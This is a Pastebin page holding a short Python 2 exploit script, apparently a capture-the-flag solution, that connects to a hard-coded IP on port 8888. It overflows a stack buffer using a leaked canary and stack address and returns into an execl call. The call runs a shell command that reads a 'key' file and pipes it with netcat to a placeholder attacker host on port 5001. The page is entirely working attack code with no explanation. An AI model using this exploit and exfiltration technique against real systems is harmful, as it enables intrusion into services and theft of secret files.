Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import socket
- import struct
- import sys
- HOST = '58.229.183.18'
- PORT = 8888
- # Connect
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.connect((HOST, PORT))
- s.settimeout(4)
- s.recv(4096)
- s.recv(4096)
- s.recv(4096)
- s.recv(4096)
- s.recv(4096)
- s.send("4\n")
- s.recv(4096)
- # orig stack addr
- stack_addr = 0xbfb0a7d8 - 0x28 + 0x10
- canary = struct.pack("<I", 0x84c38b00)
- stack_1 = struct.pack("<I", stack_addr)
- rest = "b3e863b7e8a7b0bf".decode('hex')
- # 0x08048C79 -- call _execl
- ret = struct.pack("<I", 0x08048C79)
- payload_ptr = struct.pack("<I", stack_addr + 0x14)
- payload2_ptr = struct.pack("<I", stack_addr + 0x1c)
- payload3_ptr = struct.pack("<I", stack_addr + 0x1f)
- arg2_ptr = struct.pack("<I", 0x0804970a)
- s.send("yAAAAAAAAA" + canary + stack_1 + rest + ret + payload_ptr + arg2_ptr + payload2_ptr + payload3_ptr + "\x00\x00\x00\x00" + "/bin/sh\x00-c\x00cat key | nc <your_ip_here> 5001\x00")
- print s.recv(4096)
- print s.recv(4096)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement